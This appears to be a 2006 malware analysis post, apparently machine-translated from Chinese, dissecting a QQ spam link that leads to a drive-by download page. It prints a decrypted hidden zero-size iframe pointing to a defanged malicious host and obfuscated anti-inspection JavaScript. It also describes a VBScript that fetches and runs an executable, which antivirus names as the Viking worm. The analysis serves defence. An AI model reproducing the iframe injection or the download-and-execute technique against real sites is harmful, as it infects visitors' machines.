EndurerOriginal
2006-10-08 th
1Version
The information automatically sent by QQ is:
/--------
Check out my recent photos ~~~ To scan the Q-zone space. Is it too explicit ....
Hxxp: // Q-zone. *** QQ. c0m. % 34% 76% 30 *** % 2e % 63% 6e/** Photo/cgi_bin & 387 ** 381/
--------/
Click the header of the webpage opened by this link to use the Javascript script code encrypted by the custom function psw. After decryption:
/--------
<IFRAME src = hxxp: // web *** 1.39 *** com.org/m??#s/mm=##.htm width = 0 Height = 0> </iframe>
--------/
MM ***. htmThe script program starting with htmlship encryption is divided into two parts:
Previous partThe decrypted code is written in Javascript. the decrypted code is as follows:
/--------
<Script language = JavaScript> ys6 = 5633; If (document. all) {function _ DM () {return false}; function _ MDM () {document. oncontextmenu = _ DM; setTimeout ("_ MDM ()", 800)}; _ MDM ();} document. oncontextmenu = new function ("Return false"); function _ NDM (e) {If (document. layers | window. sidebar) {If (E. which! = 1) return false ;}}; if (document. layers) {document. captureevents (event. mousedown); document. onmousedown = _ NDM;} else {document. onmouseup = _ NDM;}; ok74 = 3345; di39 = 7346; function _ DWS () {window. status = "the page is protected by htmlship XP"; setTimeout ("_ DWS ()", 100) ;}; _ DWS (); ky53 = 6773; jq9 = 4206; function _ DDS () {If (document. all) {document. onselectstart = function () {return false}; setTimeout ("_ DDS ()", 700) };_ DDS (); ID69 = 5348; kh81 = 489; as87 = 3348; my34 = 4488; ll93 = 5630; bi58 = 9632; st64 = 2490; _ licensed_to _ = "team"; </SCRIPT> <HTML>
--------/
Last partVBScript is used, and its function is to use ADODB. stream, Microsoft. XMLHTTP and scripting. fileSystemObject saves hxxp: // web *** 1.3 *** 9com.org/m?##s/mm=##1.exe as % Temp %/g0ld.com and uses shell. the ShellExecute method of the Application object to run.
Kaspersky reportsWorm. win32.viking. Y(Http://www.viruslist.com/en/find? Words = worm. win32.viking. Y)
RisingWorm. Viking. CX.